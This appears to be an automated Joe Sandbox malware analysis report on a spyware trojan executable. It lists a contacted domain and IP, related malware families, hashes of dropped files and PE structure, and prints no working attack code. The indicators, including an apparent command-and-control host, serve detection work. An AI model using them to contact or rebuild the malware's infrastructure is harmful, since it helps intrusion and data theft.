| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 1% | Virustotal | Browse | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 1% | Virustotal | Browse | ||
| 1% | Virustotal | Browse | ||
| 1% | Virustotal | Browse | ||
| 1% | Virustotal | Browse |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| m4gx.dns04.com | 206.71.149.162 | true | false | high |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| false | high | ||
| false | high | ||
| false | high | ||
| false | high | ||
| false | high | ||
| false | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| false | high | |||
| false |
| unknown | ||
| false |
| unknown | ||
| false | high | |||
| false |
| unknown | ||
| false |
| unknown | ||
| false | high | |||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false |
| unknown | ||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 206.71.149.162 | m4gx.dns04.com | United States | 2914 | NTT-COMMUNICATIONS-2914US | false |
| Joe Sandbox Version: | 38.0.0 Ammolite |
| Analysis ID: | 1330994 |
| Start date and time: | 2023-10-24 06:54:27 +02:00 |
| Joe Sandbox Product: | CloudBasic |
| Overall analysis duration: | 0h 7m 24s |
| Hypervisor based Inspection enabled: | false |
| Report type: | full |
| Cookbook file name: | default.jbs |
| Analysis system description: | Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
| Number of analysed new started processes analysed: | 17 |
| Number of new started drivers analysed: | 0 |
| Number of existing processes analysed: | 0 |
| Number of existing drivers analysed: | 0 |
| Number of injected processes analysed: | 0 |
| Technologies: |
|
| Analysis Mode: | default |
| Analysis stop reason: | Timeout |
| Sample file name: | dGuYmJNS1K.exerenamed because original name is a hash value |
| Original Sample Name: | 897af5616bfd6af5b687876924f39ee3.exe |
| Detection: | MAL |
| Classification: | mal100.troj.spyw.evad.winEXE@21/19@1/1 |
| EGA Information: |
|
| HCA Information: |
|
| Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size exceeded maximum capacity and may have missing disassembly code.
- Report size getting too big, too many NtAllocateVirtualMemory calls found.
- Report size getting too big, too many NtEnumerateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
| Time | Type | Description |
|---|---|---|
| 06:55:41 | API Interceptor |
⊘No context
⊘No context
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| NTT-COMMUNICATIONS-2914US | Get hash | malicious | Mirai | Browse |
| |
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Pushdo | Browse |
| ||
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Mirai | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| 37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | Unknown | Browse |
| |
| Get hash | malicious | GuLoader | Browse |
| ||
| Get hash | malicious | Remcos, GuLoader | Browse |
| ||
| Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
| Get hash | malicious | GuLoader | Browse |
| ||
| Get hash | malicious | PrivateLoader | Browse |
| ||
| Get hash | malicious | GuLoader | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | GuLoader | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | GuLoader | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | GuLoader, Lokibot | Browse |
| ||
| Get hash | malicious | GuLoader, Remcos | Browse |
| ||
| Get hash | malicious | GuLoader, Remcos | Browse |
| ||
| Get hash | malicious | AgentTesla | Browse |
| ||
| Get hash | malicious | NanoCore, GuLoader | Browse |
| ||
| Get hash | malicious | GuLoader, Remcos | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| C:\wql455oi0\lp1a3 | Get hash | malicious | DarkCloud | Browse | ||
| Get hash | malicious | AgentTesla | Browse | |||
| Get hash | malicious | FormBook | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | RedLine | Browse | |||
| Get hash | malicious | RedLine | Browse | |||
| Get hash | malicious | FormBook | Browse | |||
| Get hash | malicious | AgentTesla | Browse | |||
| Get hash | malicious | AgentTesla | Browse | |||
| Get hash | malicious | AgentTesla | Browse | |||
| Get hash | malicious | Amadey, Remcos | Browse | |||
| Get hash | malicious | FormBook | Browse | |||
| Get hash | malicious | Snake Keylogger | Browse | |||
| Get hash | malicious | CryptbotV2 | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Unknown | Browse |
| Process: | C:\Windows\SysWOW64\wscript.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 6268929 |
| Entropy (8bit): | 7.481378985443105 |
| Encrypted: | false |
| SSDEEP: | 98304:SkMdmYyU9wpjEyYOsESNTQGizsZT+Yqr5WlHM0uzZ5qCq01D/d83abo8P1pb8P10:SxPyWwpjz3OGfolHjz09d8GK/t2p |
| MD5: | 450B07DAC0AC61A5F472EDB8D1388FB4 |
| SHA1: | 1BC78645F065160D7C8EF303FB7C54CD675A91FA |
| SHA-256: | E65C5B198D5B51945875ADCE98E36FB2DC1B00FF03BE6152D5F335F15C32B532 |
| SHA-512: | 8FBE63D331FB7CEC246945556AC036FB108D4996839FA1B85EF751A09983985046BA74C948D3BAD3D21D37C85EFACF726EDE8A3D33C850676244AD360F394BAD |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\wscript.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 146 |
| Entropy (8bit): | 4.209312746469177 |
| Encrypted: | false |
| SSDEEP: | 3:Myx40tiUvt2tvJyR4bjWytwWVkF71Xx4TW2MBfEovwmTtT:Myx40QUItvJxHWytwWqbyTxyJv7TtT |
| MD5: | 60937323F3D67AC4E2C37CE2B095396D |
| SHA1: | C7521AD57185451D6E49F5EAA6710DE9BEBEE472 |
| SHA-256: | F068E1BD99AE05415F0496476747499CBD8CFC32E0DFE6EE94E84F533A449BDC |
| SHA-512: | 25DC36D2087CEB0DC521EBCF3F360FC86EE5BBDF683940FB6FFCCBED6430E5CA47DF76F5940122C0EAFA3FC612F2A4C876E2172487D596773F15DE1A2A9D9957 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\wscript.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 3029 |
| Entropy (8bit): | 3.500056937995765 |
| Encrypted: | false |
| SSDEEP: | 24:VspCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCGtjwTstuTE5tITK1vtqTOtPnTntRTlZ:ucwzgAUUI7zbxdnWfn4YXKxy8wcLN |
| MD5: | 2A6ECAF3A708D6C73986A0D0F31B6CEE |
| SHA1: | 7DB214A7D4C75132F87845331BC8AD1956F8790E |
| SHA-256: | 8A0868B6D4389C2BE62DD9AB4B8EE2FC56A8F3644409771DF7211ADD54001595 |
| SHA-512: | 81A5807E1C7A9024CEFD2A14A10AAAA15B5DF2B0F0C6E03D7B7F124DC0E16668BC5F51C461A9151CA8C342616986DC194E5017A8A5421D2BE65748592D2F7A2D |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\cmd.exe |
| File Type: | |
| Category: | modified |
| Size (bytes): | 133 |
| Entropy (8bit): | 4.597169768172968 |
| Encrypted: | false |
| SSDEEP: | 3:iTRIcdTc2OpyP184GRn9ehh4SQBsUDRCFOZRTOWMjKczxdoT:AdTcppytfwAQBlDRYOvTOWq9doT |
| MD5: | EA66E1733918B58BE956505F4FEFFB65 |
| SHA1: | A93C137AAE5D4E6680A35E16278540E89146F7AB |
| SHA-256: | 1DF43E2C1950360C693B42F002FCA7911B5F6696FCC2E770958816110B0E589A |
| SHA-512: | F741362A0B6253A5E22052443042C3283BD0BC1E76665BF27D6B4E5B99F86D01B325A6FC2365206EB482B8E7104A31452918721B61EFC99C18A729377165E4D6 |
| Malicious: | true |
| Preview: |
| Process: | C:\Windows\SysWOW64\wscript.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 315 |
| Entropy (8bit): | 5.233796231796999 |
| Encrypted: | false |
| SSDEEP: | 6:pn0+Dy9xwol6hEr6VX16hu9nPG+RBKRCwFxBFm8oD:J0+ox0RJWWPGsgtm8+ |
| MD5: | 6671DB1F87E91E4201E680711AA76C8E |
| SHA1: | 1512FDDA11FC55895D83916CE16B81FAA7FFAEA6 |
| SHA-256: | 0D692373817FCB096B3510B48F0C1D6905C37054039A9250679FA9D5308CD44E |
| SHA-512: | 6FD5FB418E68D26D981E5F59CCF002F2F1BBA11D0FC64A8379D400F29694FF58FB977CE39346F5176AFD4FD7C3C32BE1A3474B3D7D4D0201A6CD199326439F03 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\wscript.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 267986 |
| Entropy (8bit): | 7.9993579032027 |
| Encrypted: | true |
| SSDEEP: | 6144:xzBD9WIL9pWZp2c9mNewl4mHVaXQBnRpju0SADyROBtw0ixUv:xVD9WePWZproNJDQXwju0BMaiyv |
| MD5: | 69F1C85ED7640BB633E646A9813EB3F7 |
| SHA1: | 75E359F6838F4CA5DB7E5F46B644A876081E5843 |
| SHA-256: | 6102A9C1301304FE1C2CA7652F55CB202AC98E16D89E11DC3BE7272C845155B0 |
| SHA-512: | BE5DAEBA3FB37F02F74E392DEDAD4CA742FE5DCDCA246CEF48B4E8F06A8C134D796C921E06A7287F66906019CA32E7437ADF255B7491FA56850D2FE172B08555 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\wscript.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 75 |
| Entropy (8bit): | 3.360205991623169 |
| Encrypted: | false |
| SSDEEP: | 3:bqFNmjjLmyWY2SmPqFNmjmswmYwn:bqejufnqejmswS |
| MD5: | 52E373B85CA07452EA95AAC4B42CCD07 |
| SHA1: | 2D2F7115BDA7075A3711FD1E1D569981A0B48F9A |
| SHA-256: | DA75E54A65AFE9BF2369ABEA866D8EE5FF7962B008538D0434CC02E72E234127 |
| SHA-512: | 518CCAC0B1D2B3623961FCC7D7CA086841F77B653AEBAAB828E8D3168FAE287DABFA3CFD68F48CBED1F15B95129DE154F45A20A198E6926366581D595EB4DDD2 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\wscript.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 4361165 |
| Entropy (8bit): | 7.995000411667346 |
| Encrypted: | true |
| SSDEEP: | 98304:2zwaBU6dIESFphgbVZ0Pl0wQ/EkA0/A+jbeOA/PUteJh8Pji+yrd7/:uwa66drSF99eMjdCEs2OSl |
| MD5: | 95D33059085CD2681BBB402708A6FB54 |
| SHA1: | B2FA74C98643243AF35FDE71F899301045DAF422 |
| SHA-256: | 7C8007334E8D4E36940BD3C8933F30806F00E0240F5EB24538513738CA94148C |
| SHA-512: | 051FFB35FB54F0A3044F3FD8F348095B1924B012E6F822F4F913C497265C443230EF1C9349A36DE6E1AC69BFA70B117A7667802C74FCCD90DB1BD45F76CA8E5E |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\wscript.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 26251 |
| Entropy (8bit): | 5.917089437699929 |
| Encrypted: | false |
| SSDEEP: | 768:39AsDMthWm9pxckfJsStdpSvLdO4SGuWt3QQ4CTdvTP8MWQunMDQMQSMIQlQH:39AFD9pxc2Js74CTdvTP8MWpMDrLMI2q |
| MD5: | FDCF97EB61997D416AFCD540A64C7D62 |
| SHA1: | 951B95F6038CF8FEA6DE50DA3C766FF516418C63 |
| SHA-256: | 3CD232A70C2B7B1EFC82A4493FE49979DCC78EA18E0EABB5EA5FAAD0F03765ED |
| SHA-512: | 8F55B228240FE7BB942E3C78E0AEA68D372DA33BB9CFFA1DB0E5D4A245D0D99F86FAA5D639816CE09B4C4871E205C35A56568C900B16218C38E4C1166F0DC9CE |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\wscript.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 486993 |
| Entropy (8bit): | 7.999119022567114 |
| Encrypted: | true |
| SSDEEP: | 12288:pl3RNmchhZg8pqX6/IR+uOtQL8W3xQUSxic/:pl3RUchHt4c8xplxcxic/ |
| MD5: | AB9BBDD85D280B71BB4920677462C75D |
| SHA1: | DD46BBCCFD75636B171674C803FBB65946508CE2 |
| SHA-256: | 5397CD8246756DFE42BA151665213DC31B48EE25C4939A0263DAEB1DF8A256CB |
| SHA-512: | E5246EA54B2C55817649AFB75B5C7F7253153FBBDB6B5D2A010A14E1819F1A7344B95CC993EA526364EC50592F403DB3F22E875AB932B96B00F9F6C27D04F3CA |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
Download File
| Process: | C:\Windows\SysWOW64\wscript.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 6144 |
| Entropy (8bit): | 4.132654999696168 |
| Encrypted: | false |
| SSDEEP: | 48:rKsPtLu1vVW0T1MqughNY1IkAKOSuPlQ2SuHxpknIxadRS8mu9SZZqu3pb:Tq9J4ClVORdR9Ip |
| MD5: | F2FAFF6F3CA8944A11AF0E1BE9369007 |
| SHA1: | D62D93DE60D3CEE6F6B2801993DDB23FDDE4EF16 |
| SHA-256: | 230C17956EDBCCB59A351DF8E9989AFF828F76D039801538BE672AA8BCFCA69C |
| SHA-512: | 1C6574BD5B461CA5B38FC27686229C769F3D8D8D0542E1ACCE992B8E51D5E3E96DE2728363E13B77A4F9D41DC1E2598B3D1E125E416903034856E92B9D91428A |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\wscript.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 267986 |
| Entropy (8bit): | 7.9993579032027 |
| Encrypted: | true |
| SSDEEP: | 6144:xzBD9WIL9pWZp2c9mNewl4mHVaXQBnRpju0SADyROBtw0ixUv:xVD9WePWZproNJDQXwju0BMaiyv |
| MD5: | 69F1C85ED7640BB633E646A9813EB3F7 |
| SHA1: | 75E359F6838F4CA5DB7E5F46B644A876081E5843 |
| SHA-256: | 6102A9C1301304FE1C2CA7652F55CB202AC98E16D89E11DC3BE7272C845155B0 |
| SHA-512: | BE5DAEBA3FB37F02F74E392DEDAD4CA742FE5DCDCA246CEF48B4E8F06A8C134D796C921E06A7287F66906019CA32E7437ADF255B7491FA56850D2FE172B08555 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\wscript.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 267985 |
| Entropy (8bit): | 7.999334055492875 |
| Encrypted: | true |
| SSDEEP: | 6144:qT6qIt5S0jcL6pI/YRFDJKblflC8Gc0jNX0vCceEHNuj8BfMH:pS0cgIaFDoblfY8D0xEreEcj8k |
| MD5: | 02EF3ED827640B2C4D8941B5160D55BE |
| SHA1: | 69CE926BF0147B76E5A6A643C5535E37153BF3A0 |
| SHA-256: | 74FEEE28045A45BD5C17EEB91A91292FFEA341F4CDA737C87C8094857ECD57B5 |
| SHA-512: | D7D194572A980D221BBEC58399D7924E6334862C8CC36F0F7C65773B826E0EF1EE03D88AACCBB0C7BE037A17778E034D0C91516E9E33C2E4B5592E04E91BD0DA |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\wscript.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 486993 |
| Entropy (8bit): | 7.999119022567114 |
| Encrypted: | true |
| SSDEEP: | 12288:pl3RNmchhZg8pqX6/IR+uOtQL8W3xQUSxic/:pl3RUchHt4c8xplxcxic/ |
| MD5: | AB9BBDD85D280B71BB4920677462C75D |
| SHA1: | DD46BBCCFD75636B171674C803FBB65946508CE2 |
| SHA-256: | 5397CD8246756DFE42BA151665213DC31B48EE25C4939A0263DAEB1DF8A256CB |
| SHA-512: | E5246EA54B2C55817649AFB75B5C7F7253153FBBDB6B5D2A010A14E1819F1A7344B95CC993EA526364EC50592F403DB3F22E875AB932B96B00F9F6C27D04F3CA |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\wscript.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 486992 |
| Entropy (8bit): | 7.998036809684333 |
| Encrypted: | true |
| SSDEEP: | 12288:kp3yQJLjC1pn9kSJNE89AGUsojoZcsZJ2yKI+fuN:kp3NLepn9L9q3jBsZ4ygmN |
| MD5: | A4DB1E03453FBA757BA0677DC4EF5E13 |
| SHA1: | 09E23C0A52157952E6EF6DC267A22DF95F5811F2 |
| SHA-256: | 52BB35795BC48DD4598A95562F9C37B6E7ACD1ADAACFBDE688F3798AB7269206 |
| SHA-512: | D01E10C093742D3A04BBD8BB30813D848D2230F46118135E7D4F9477879640D839233CB9E71CC6056F8B6D8E69B2D04064F21C044E267CA22CB6D943589280B9 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\wscript.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 4361165 |
| Entropy (8bit): | 7.995000411667346 |
| Encrypted: | true |
| SSDEEP: | 98304:2zwaBU6dIESFphgbVZ0Pl0wQ/EkA0/A+jbeOA/PUteJh8Pji+yrd7/:uwa66drSF99eMjdCEs2OSl |
| MD5: | 95D33059085CD2681BBB402708A6FB54 |
| SHA1: | B2FA74C98643243AF35FDE71F899301045DAF422 |
| SHA-256: | 7C8007334E8D4E36940BD3C8933F30806F00E0240F5EB24538513738CA94148C |
| SHA-512: | 051FFB35FB54F0A3044F3FD8F348095B1924B012E6F822F4F913C497265C443230EF1C9349A36DE6E1AC69BFA70B117A7667802C74FCCD90DB1BD45F76CA8E5E |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\wscript.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 6268929 |
| Entropy (8bit): | 7.481378985443105 |
| Encrypted: | false |
| SSDEEP: | 98304:SkMdmYyU9wpjEyYOsESNTQGizsZT+Yqr5WlHM0uzZ5qCq01D/d83abo8P1pb8P10:SxPyWwpjz3OGfolHjz09d8GK/t2p |
| MD5: | 450B07DAC0AC61A5F472EDB8D1388FB4 |
| SHA1: | 1BC78645F065160D7C8EF303FB7C54CD675A91FA |
| SHA-256: | E65C5B198D5B51945875ADCE98E36FB2DC1B00FF03BE6152D5F335F15C32B532 |
| SHA-512: | 8FBE63D331FB7CEC246945556AC036FB108D4996839FA1B85EF751A09983985046BA74C948D3BAD3D21D37C85EFACF726EDE8A3D33C850676244AD360F394BAD |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\wscript.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 267794 |
| Entropy (8bit): | 7.99933119517405 |
| Encrypted: | true |
| SSDEEP: | 6144:9TIoIt5S0jIL2pILYRzDJKzlPlC8yc0jNXOvcce0HNu/+BfrB:oS0IMI+zDozlPY8X0x+Ze0c/+j |
| MD5: | 3750FDEF2AA69A5B89918DAA4AAF8790 |
| SHA1: | 58DD9F8A0A26FE592F24EC0AAD2477917D6A470A |
| SHA-256: | A5FA7D12B661596B94F9A67E7E7563F7AF78C16F88B09CC335B55F6D7A01CA90 |
| SHA-512: | 629454C36A3F68282BE5D547FF3AAFCAE6334627D3CCCA5776EA1846313306571EEB34F427FDFA22CAC08C19CC5C499B1B36421D567E32F0F1669381587AA71B |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\wscript.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 947288 |
| Entropy (8bit): | 6.629681466265794 |
| Encrypted: | false |
| SSDEEP: | 24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK |
| MD5: | 0ADB9B817F1DF7807576C2D7068DD931 |
| SHA1: | 4A1B94A9A5113106F40CD8EA724703734D15F118 |
| SHA-256: | 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B |
| SHA-512: | 883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A |
| Malicious: | true |
| Antivirus: |
|
| Joe Sandbox View: |
|
| Preview: |
| File type: | |
| Entropy (8bit): | 5.701011112526351 |
| TrID: |
|
| File name: | dGuYmJNS1K.exe |
| File size: | 1'049'600 bytes |
| MD5: | 897af5616bfd6af5b687876924f39ee3 |
| SHA1: | d560fdaed07146a1b4fa519ae023bfa61c1594a6 |
| SHA256: | 8a013b99a9b82e0f67b3e472f7627052915507916311f10cac5b69e87f3d19d4 |
| SHA512: | 36aa88852ed1589b51ae8a49c01792acc2f6f648bfa45fbaefaaf7055bd79517ce2f3b9471a5dfb4d652cf336674231f2d5b7d985a69e4d6aa719b623dc1a823 |
| SSDEEP: | 12288:Tq73genXXHoA/of0L4enXXHoA/of0LOOR1:uZnR/eUhnR/eUOG |
| TLSH: | 70255D51E096113AFDD87A340092B1A53B02DE7F19429DBECCCBEACBC54626329D5C9F |
| File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.C]v.-.v.-.v.-.=...|.-.=.(...-.=.).b.-...(.P.-...).d.-.....b.-.=.,.q.-.v.,...-...$.w.-.....w.-.v...w.-.../.w.-.Richv.-........ |
 | |
| Icon Hash: | a8a87a3396d251cc |
| Entrypoint: | 0x4015f8 |
| Entrypoint Section: | .text |
| Digitally signed: | false |
| Imagebase: | 0x400000 |
| Subsystem: | windows gui |
| Image File Characteristics: | EXECUTABLE_IMAGE, 32BIT_MACHINE |
| DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
| Time Stamp: | 0x6531D41C [Fri Oct 20 01:13:00 2023 UTC] |
| TLS Callbacks: | |
| CLR (.Net) Version: | |
| OS Version Major: | 6 |
| OS Version Minor: | 0 |
| File Version Major: | 6 |
| File Version Minor: | 0 |
| Subsystem Version Major: | 6 |
| Subsystem Version Minor: | 0 |
| Import Hash: | e957e1fac34ad27ace053a2e67ea5b97 |
| Instruction |
|---|
| call 00007F3A74D9604Ah |
| jmp 00007F3A74D95AFFh |
| push ebp |
| mov ebp, esp |
| push 00000000h |
| call dword ptr [0041004Ch] |
| push dword ptr [ebp+08h] |
| call dword ptr [00410048h] |
| push C0000409h |
| call dword ptr [00410050h] |
| push eax |
| call dword ptr [00410054h] |
| pop ebp |
| ret |
| push ebp |
| mov ebp, esp |
| sub esp, 00000324h |
| push 00000017h |
| call dword ptr [00410058h] |
| test eax, eax |
| je 00007F3A74D95C87h |
| push 00000002h |
| pop ecx |
| int 29h |
| mov dword ptr [004179D8h], eax |
| mov dword ptr [004179D4h], ecx |
| mov dword ptr [004179D0h], edx |
| mov dword ptr [004179CCh], ebx |
| mov dword ptr [004179C8h], esi |
| mov dword ptr [004179C4h], edi |
| mov word ptr [004179F0h], ss |
| mov word ptr [004179E4h], cs |
| mov word ptr [004179C0h], ds |
| mov word ptr [004179BCh], es |
| mov word ptr [004179B8h], fs |
| mov word ptr [004179B4h], gs |
| pushfd |
| pop dword ptr [004179E8h] |
| mov eax, dword ptr [ebp+00h] |
| mov dword ptr [004179DCh], eax |
| mov eax, dword ptr [ebp+04h] |
| mov dword ptr [004179E0h], eax |
| lea eax, dword ptr [ebp+08h] |
| mov dword ptr [004179ECh], eax |
| mov eax, dword ptr [ebp-00000324h] |
| mov dword ptr [00417928h], 00010001h |
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x15bfc | 0x50 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x19000 | 0xe98c0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x103000 | 0xfb8 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x14fe8 | 0x70 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x14f28 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x10000 | 0x184 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0xe57e | 0xe600 | False | 0.6135699728260869 | data | 6.563275106374818 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x10000 | 0x649c | 0x6600 | False | 0.4186197916666667 | data | 4.832945204684908 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x17000 | 0x15ac | 0xa00 | False | 0.152734375 | data | 2.034690130097456 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x19000 | 0xe98c0 | 0xe9a00 | False | 0.3653524612092028 | data | 5.5307728708308845 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x103000 | 0xfb8 | 0x1000 | False | 0.77294921875 | data | 6.470326556002081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_BITMAP | 0x6fd08 | 0x92a00 | Device independent bitmap graphic, 542 x 277 x 32, image size 600536 | English | United States | 0.09073456148763853 |
| RT_ICON | 0x192b0 | 0x2b450 | Device independent bitmap graphic, 207 x 414 x 32, image size 171396 | English | United States | 0.8298839938611537 |
| RT_ICON | 0x44718 | 0x2b450 | Device independent bitmap graphic, 207 x 414 x 32, image size 171396 | English | United States | 0.8298839938611537 |
| RT_MENU | 0x6fb80 | 0x4a | data | English | United States | 0.8648648648648649 |
| RT_DIALOG | 0x6fbe0 | 0x128 | data | English | United States | 0.6081081081081081 |
| RT_STRING | 0x102708 | 0x34 | data | English | United States | 0.5192307692307693 |
| RT_ACCELERATOR | 0x6fbd0 | 0x10 | data | English | United States | 1.25 |
| RT_GROUP_ICON | 0x44700 | 0x14 | data | English | United States | 1.2 |
| RT_GROUP_ICON | 0x6fb68 | 0x14 | data | English | United States | 1.25 |
| RT_MANIFEST | 0x102740 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727 |
| DLL | Import |
|---|---|
